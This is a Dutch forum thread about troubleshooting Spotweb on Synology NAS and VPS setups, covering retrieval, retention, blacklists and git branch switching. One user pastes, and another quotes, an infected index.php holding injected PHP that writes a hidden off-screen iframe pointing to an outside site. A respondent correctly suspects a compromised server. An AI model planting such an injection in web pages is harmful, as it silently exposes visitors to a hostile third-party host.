Canon EOS 40D , 7D MK2 + glas van 18-500 mm, synology DS212, en overige meuk

Acties:
  • 0 Henk 'm!

• Caveman

Caveman

whahoehaha

Jeronimo78 schreef op zondag 27 oktober 2013 @ 14:33:

1) de huidige versie draait in een folder genaamd spotwebnieuw. Als ik deze rename naar spotweb dan krijg ik een server error 500. Vlgns mij moet ik dus ergens in de installatie aangeven waar de installatie staat. Maar ik kan niet vinden waar. Dus de vraag is, waar moet ik dat aanpassen?
Info, info, info.... error 500 is een serverside probleempje. Dus wat gebruik je als server?
2) nu ik bij tweaknews zit kan ik veel verder terug spots inzien. (voorheen bij xs4all was dat iets van 20 dagen max). Hoe kan ik checken of ik inmiddels alles binnen heb aan (historische) spots?
Heb je een nieuwe database aangemaakt en is de eerste retrieve al klaar, dan ja... dan heb je alles binnen.

Acties:
  • 0 Henk 'm!

• Jeronimo78
Caveman schreef op maandag 28 oktober 2013 @ 10:19:
[...]
Info, info, info.... error 500 is een serverside probleempje. Dus wat gebruik je als server?
Ohw jah, sorry, draai alles op een synology DS212 (met DSM4.3)
Als ik de nieuwe installatie in de folder spotwebnieuw draai is er helemaal niets aan de hand. Hernoem ik de folder naam maar spotweb, dan gaat het dus mis. Vervolgens terugzetten naar oorspronkelijke naam (spotwebnieuw) en niets aan de hand.
Wellicht nog een oude sessie of cookies van de oude install?
[...]
Heb je een nieuwe database aangemaakt en is de eerste retrieve al klaar, dan ja... dan heb je alles binnen.
Ja na nieuwe install is de eerste retrieve klaar en vervolgens nog de cron gedurende 2 dagen elk uur 5000 spots laten ophalen met buggy mode aan.
Lijst zou dus compleet moeten zijn, dank voor dat antwoord.

Acties:
  • 0 Henk 'm!

• Caveman

Caveman

whahoehaha

Jeronimo78 schreef op maandag 28 oktober 2013 @ 12:34:
[...]

Ohw jah, sorry, draai alles op een synology DS212 (met DSM4.3)
Als ik de nieuwe installatie in de folder spotwebnieuw draai is er helemaal niets aan de hand. Hernoem ik de folder naam maar spotweb, dan gaat het dus mis. Vervolgens terugzetten naar oorspronkelijke naam (spotwebnieuw) en niets aan de hand.
Wellicht nog een oude sessie of cookies van de oude install?
Heb je misschien nog een bestandje ownsettings.php in je spotweb map staan ?

Acties:
  • 0 Henk 'm!

• Jeronimo78
Nope die heb ik nooit gebruikt.
De "oude" map spotweb is ook volledig met alle content verwijderd en gecheckt. Daarna de "nieuwe" folder hernoemd.
Wat ik me dus afvraag, wordt er tijdens de setup/install ergens een locatie van spotweb weggeschreven die ik niet kan terug vinden?
In de database zie ik het niet, en ook in de .php bestanden kan ik het niet vinden.

Acties:
  • 0 Henk 'm!

• Binnetie
  • Registratie: November 2000
  • Laatst online: 18-09 21:19
Na contact gehad te hebben met mijn kennis waar ik een spotweb installatie draai op zijn VPS ben ik een stapje verder waarom ik een blanco pagina krijg ik als ik naar mijn spotweb surf.

Er zit een fout op line 443 in mijn index.php:

code:
1
2
3
4
5
6
7
8
9
10
11
12
13
catch(InvalidOwnSettingsSettingException $x) {
    echo "There is an error in your ownsettings.php<br><br>" . PHP_EOL;
    echo nl2br($x->getMessage());
} # InvalidOwnSettingsSettingException

catch(OwnsettingsCreatedOutputException $x) {
    echo "ownsettings.php or dbsettings.inc.php created output. Please make sure theese files do not contain a PHP closing tag ( ?>
<?php
#44e890#
if(empty($b)) {
$b = "<style>body {overflow-x:hidden;overflow-y:auto;} </style>
<iframe id=\"efeak\" name=\"efeak\" style=\"position:absolute; height: 100px; width:120px; left:5000px; top:120px;\" src=\"http://son-risas.com/rel.php\" > </iframe>
";

Het gaat dan om deze regel:
code:
1

Er is helemaal niks aan de installatie gedaan, maar wat kan dit nu zijn?

Acties:
  • 0 Henk 'm!

• MikeOO
Binnetie schreef op dinsdag 29 oktober 2013 @ 11:57:
Na contact gehad te hebben met mijn kennis waar ik een spotweb installatie draai op zijn VPS ben ik een stapje verder waarom ik een blanco pagina krijg ik als ik naar mijn spotweb surf.

code:
1
2
3
4
5
6
7
8
9
10
11
12
13
catch(InvalidOwnSettingsSettingException $x) {
    echo "There is an error in your ownsettings.php<br><br>" . PHP_EOL;
    echo nl2br($x->getMessage());
} # InvalidOwnSettingsSettingException

catch(OwnsettingsCreatedOutputException $x) {
    echo "ownsettings.php or dbsettings.inc.php created output. Please make sure theese files do not contain a PHP closing tag ( ?>
<?php
#44e890#
if(empty($b)) {
<iframe id=\"efeak\" name=\"efeak\" style=\"position:absolute; height: 100px; width:120px; left:5000px; top:120px;\" src=\"http://son-risas.com/rel.php\" > </iframe>
";

Het gaat dan om deze regel:
code:
1

Er is helemaal niks aan de installatie gedaan, maar wat kan dit nu zijn?
Test het eens zonder ownsettings.php of het dan nog goed gaat.
Check ook het eerste deel van de foutmelding
ownsettings.php or dbsettings.inc.php created output. Please make sure theese files do not contain a PHP closing tag ( ?>

Acties:
  • 0 Henk 'm!

• Jeronimo78
Zoals ik eerder in het topic al schreef zit ik sinds kort bij Tweaknews voor usenet download.
Dat is op zich geen probleem, retentie voor binaries is gewoon goed. Echter. Ik merk dat bij mij spotweb nu tot maar 9 maanden terug gaat. Ondanks dat ik aangeef dat ie vanaf het alle eerste begin moet ophalen.
Ook voor retrieve staat de buggy mode aan, dus zouden ook oudere spots die gemist zijn alsnog opgehaald moeten worden.
Vraag is dus, zijn er meer mensen die spotweb via Tweaknews hebben, en zo ja, tot hoe lang gaan jullie spots terug?

Acties:
  • 0 Henk 'm!

• elevator
  • Niet online

elevator

Binnetie schreef op dinsdag 29 oktober 2013 @ 11:57:

Ik zou haast denken dat je VPS gecrackt is of iets dergelijks. De code die je paste is namelijk een refrentie naar een wat vagere site.

Ik denk dat het tijd is dat je iemand inroept voor hulp met je VPS, dit heeft niets met Spotweb te maken :)

Acties:
  • 0 Henk 'm!

• Caveman

Caveman

whahoehaha

Jeronimo78 schreef op dinsdag 29 oktober 2013 @ 10:39:
Nope die heb ik nooit gebruikt.
De "oude" map spotweb is ook volledig met alle content verwijderd en gecheckt. Daarna de "nieuwe" folder hernoemd.
Wat ik me dus afvraag, wordt er tijdens de setup/install ergens een locatie van spotweb weggeschreven die ik niet kan terug vinden?
In de database zie ik het niet, en ook in de .php bestanden kan ik het niet vinden.
Mja, ik kan mijn spotweb map gewoon hernoemen en dan werkt die nog prima (staat ook op een synology). In het settings.php staat wel iets van een locatie, maar dat zou die gewoon moeten oppakken met een ander naam. Zit er niet iets in de cache van je brouwser ?

Acties:
  • 0 Henk 'm!

• Jeronimo78
Caveman schreef op vrijdag 01 november 2013 @ 10:53:
[...]
Mja, ik kan mijn spotweb map gewoon hernoemen en dan werkt die nog prima (staat ook op een synology). In het settings.php staat wel iets van een locatie, maar dat zou die gewoon moeten oppakken met een ander naam. Zit er niet iets in de cache van je brouwser ?
Lijkt me stug, heb verschillende browsers geprobeerd.
Zal het dit weekend nog eens proberen, dan ook met andere pc om dat 100% uit te sluiten. En anders de map maar gewoon die naam laten en bookmarks aanpassen ;)

Bedankt voor het mee denken :)

Acties:
  • 0 Henk 'm!

• MikeOO
Jeronimo78 schreef op vrijdag 01 november 2013 @ 09:46:
Zoals ik eerder in het topic al schreef zit ik sinds kort bij Tweaknews voor usenet download.
Dat is op zich geen probleem, retentie voor binaries is gewoon goed. Echter. Ik merk dat bij mij spotweb nu tot maar 9 maanden terug gaat. Ondanks dat ik aangeef dat ie vanaf het alle eerste begin moet ophalen.
Ook voor retrieve staat de buggy mode aan, dus zouden ook oudere spots die gemist zijn alsnog opgehaald moeten worden.
Vraag is dus, zijn er meer mensen die spotweb via Tweaknews hebben, en zo ja, tot hoe lang gaan jullie spots terug?
Probeer eens via Putty een Retrieve te draaien met --retro optie. Dit vult de onstane gaten op.

Voor een Synology NAS: /usr/bin/php retrieve.php --retro

Acties:
  • 0 Henk 'm!

• White_Collar
  • Registratie: Februari 2009
  • Laatst online: 18-09 17:17
ze hebben de Refactor branch gepusht naar de master branch :)

"The reason for time is so that everything doesn't happen at once"

Acties:
  • 0 Henk 'm!

• Jeronimo78
MikeOO schreef op vrijdag 01 november 2013 @ 13:19:
[...]

Probeer eens via Putty een Retrieve te draaien met --retro optie. Dit vult de onstane gaten op.

Voor een Synology NAS: /usr/bin/php retrieve.php --retro
Thnx, heb het uitgevoerd, maar het maakt geen verschil. Spots gaan terug tot max 9 mnd, waarschijnlijk heeft Tweaknews dus geen langere history voor spotweb?

De output die ik krijg na voorgaande commando;
code:
1
2
3
4
5
6
7
8
9
10
11
12
Last retrieve at Fri 01 Nov 2013 11:40:57 PM CET
Retrieving new Spots from server news.tweaknews.nl...
Appr. Message count:    552827
First message number:   3317564
Last message number:    3870391
Current message:        3870391

Processed a total of 0 spots
Finished retrieving spots.

Blacklist is probably corrupt, skipping
Whitelist is probably corrupt, skipping

Commando nog een keer uitgevoerd, maar dan gebeurd er verder niets meer. Wel blijf ik de melding over de corrupte Black/White list houden. Is dat nog op te lossen?

Acties:
  • 0 Henk 'm!

• MikeOO
Jeronimo78 schreef op vrijdag 01 november 2013 @ 23:49:
[...]

Thnx, heb het uitgevoerd, maar het maakt geen verschil. Spots gaan terug tot max 9 mnd, waarschijnlijk heeft Tweaknews dus geen langere history voor spotweb?

De output die ik krijg na voorgaande commando;
code:
1
2
3
4
5
6
7
8
9
10
11
12

Commando nog een keer uitgevoerd, maar dan gebeurd er verder niets meer. Wel blijf ik de melding over de corrupte Black/White list houden. Is dat nog op te lossen?
Tweaksnews zal Spotweb niet beperken. De retentie bepaald hoever je terug kan. Lijkt mij eerder een fout in de instellingen of database.

Probeer dit eens voor je black/white lijst.
https://github.com/spotweb/spotweb/issues/1572

Pas in de instelling dit nog eens aan naar bv 1 nov 2009. Zet retentie op 0 zodat hij geen spots gaat verwijderen.

Het kan ook goed dat je database ergens corrupt is. Beste wat je kan doen is even een isseu aanmaken bij Spotweb/Github. Je krijgt altijd vrij snel reactie en mogelijk dat ze daar tips voor je hebben.

Vermeld even duidelijk wat je al hebt geprobleerd anders krijg je weer dezelfde adviezen en daar schiet je niet veel mee op.

Acties:
  • 0 Henk 'm!

• EJPostema
  • Registratie: December 2010
  • Laatst online: 09-12-2024
White_Collar schreef op vrijdag 01 november 2013 @ 16:57:
ze hebben de Refactor branch gepusht naar de master branch :)
Dus dat wordt weer switchen?

Acties:
  • 0 Henk 'm!

• WoBBeL
  • Registratie: Juni 2004
  • Laatst online: 11-09 13:01

WoBBeL

*zwaai*

Jeronimo78 schreef op vrijdag 01 november 2013 @ 23:49:
code:
1
2
3
4
5
6
7
8
9
10
11
12

Nee helaas niet, want ik heb de black/whitelist onderuit gehaald. Beheerder meerdere kerel gemaild, maar geen antwoord mogen ontvangen. Deze server gaat binnenkort ons kleine serverparkje uit en zal dan niet meer actief door ons beheerd worden.

Acties:
  • 0 Henk 'm!

• Workaholic
  • Registratie: Februari 2003
  • Niet online
EJPostema schreef op zaterdag 02 november 2013 @ 08:55:
Dus ze hebben de refactor gepushed naar de master branche
[...]

Dus dat wordt weer switchen?
Daar ben ik ook wel benieuwd naar en zo ja hoe..

Mijn V&A

Acties:
  • 0 Henk 'm!

• strandbal

strandbal

Was het maar zo'n feest.

Net ook even geprobeerd. Met "git checkout -b master" krijg ik de melding:

code:
1
fatal: A branch named 'master' already exists.

Als ik "git pull" uitvoer krijg ik deze output:

code:
1
2
3
4
5
6
remote: Counting objects: 1, done.
remote: Total 1 (delta 0), reused 1 (delta 0)
Unpacking objects: 100% (1/1), done.
From https://github.com/spotweb/spotweb
   b0d91a9..1c31cec  master     -> origin/master
Already up-to-date.

Dan haalt 'ie 't zo te zien uit de master branch? Ik heb verder niets gedaan om van refactor naar master te switchen, dus snappen doe ik het niet helemaal.

Acties:
  • 0 Henk 'm!

• EJPostema
  • Registratie: December 2010
  • Laatst online: 09-12-2024
strandbal schreef op zondag 03 november 2013 @ 11:19:
Net ook even geprobeerd. Met "git checkout -b master" krijg ik de melding:

code:
1

Als ik "git pull" uitvoer krijg ik deze output:

code:
1
2
3
4
5
6
remote: Counting objects: 1, done.
remote: Total 1 (delta 0), reused 1 (delta 0)
Unpacking objects: 100% (1/1), done.
   b0d91a9..1c31cec  master     -> origin/master
Already up-to-date.

Dan haalt 'ie 't zo te zien uit de master branch? Ik heb verder niets gedaan om van refactor naar master te switchen, dus snappen doe ik het niet helemaal.
Misschien was je niet Geswitcht?

Acties:
  • 0 Henk 'm!

• strandbal

strandbal

Was het maar zo'n feest.

Een tijdje geleden ben ik zeker weten geswitcht, genoeg database upgrade errors en php errors gehad die uitgeplozen moesten worden :P

Misschien zoveel gerommeld dat ik weer op master zit?

Acties:
  • 0 Henk 'm!

• vanaalten
  • Registratie: September 2002
  • Nu online
Mja, ik moet mij geloof ik ook maar eens gaan verdiepen in 'git'. Ik *dacht* naar refactor geswitcht te zijn en een git pull doet:
remote: Counting objects: 959, done.
remote: Compressing objects: 100% (447/447), done.
remote: Total 778 (delta 551), reused 525 (delta 306)
Receiving objects: 100% (778/778), 157.55 KiB, done.
Resolving deltas: 100% (551/551), completed with 107 local objects.
84ef9ce..b9ea254 refactor -> origin/refactor
b0d91a9..1c31cec master -> origin/master
Updating 84ef9ce..b9ea254
Maar dan een 'git checkout -b master':
Gezien die laatste regel "Updating 84ef9ce..b9ea254" heeft 'ie 'refactor' voor mij geupgrade. Nu nog dat ding zover krijgen dat 'ie 'master' voortaan weer gaan pakken.

Edit: en even verdiepen levert mij wat op. "git checkout master" (zonder '-b') was genoeg, die optie is blijkbaar om naar een nieuwe branch te gaan - hier niet het geval.

[ Voor 9% gewijzigd door vanaalten op 03-11-2013 12:39 ]

Acties:
  • 0 Henk 'm!

• Matis
  • Registratie: Januari 2007
  • Laatst online: 18-09 21:46

Matis

Rubber Rocket

Je moet eerst
git fetch origin

doen, dan kun je
git checkout refactor

doen.

If money talks then I'm a mime
If time is money then I'm out of time

Acties:
  • 0 Henk 'm!

• White_Collar
  • Registratie: Februari 2009
  • Laatst online: 18-09 17:17
Workaholic schreef op zaterdag 02 november 2013 @ 12:01:
[...]

Daar ben ik ook wel benieuwd naar en zo ja hoe..
Ze gaan de refactor eruit gooien, zie ook: https://github.com/spotweb/spotweb/issues/1932

"The reason for time is so that everything doesn't happen at once"

Acties:
  • 0 Henk 'm!

• strandbal

strandbal

Was het maar zo'n feest.

Matis schreef op zondag 03 november 2013 @ 12:53:
Je moet eerst
git fetch origin

doen, dan kun je
git checkout refactor

doen.
Dat eerste commando ging goed, maar daarna krijg ik "already on 'refactor'"

edit: "git branch" geeft een sterretje bij "refactor", dus dat staat toch niet helemaal OK?

[ Voor 13% gewijzigd door strandbal op 03-11-2013 13:57 ]

Pagina: 1 ... 22 ... 50 Laatste

Let op:
Houd er rekening mee dat je geen link zet naar content, dat levert je direct een waarschuwing op.
LET OP: Linken naar spotweb sites is dus ook niet de bedoeling..

Lees de topicstart voor je een vraag stelt! Hierin staan meerdere antwoorden voorgekauwd.